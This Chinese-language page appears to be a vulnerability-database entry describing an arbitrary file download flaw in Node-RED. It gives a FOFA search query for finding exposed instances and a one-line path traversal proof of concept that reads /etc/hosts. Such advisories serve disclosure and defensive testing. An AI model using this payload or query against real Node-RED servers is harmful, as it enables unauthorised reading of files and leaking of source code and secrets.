Node-RED_任意文件下载漏洞-棉花糖会员站

Node-RED_任意文件下载漏洞

7月15日发布

020

# Node-RED 任意文件下载漏洞

## 漏洞描述

Node-RED存在任意文件下载漏洞，可造成信息泄露，源码泄露。

## 漏洞影响

> Node-RED

## FOFA

> title=”Node-RED”

## 漏洞复现

页面如下：

![图片3](/static/qingy/Node-RED_任意文件下载漏洞/img/图片3.png)

###poc

“`
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
“`

![图片4](/static/qingy/Node-RED_任意文件下载漏洞/img/图片4.png)

![图片5](/static/qingy/Node-RED_任意文件下载漏洞/img/图片5.png)

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容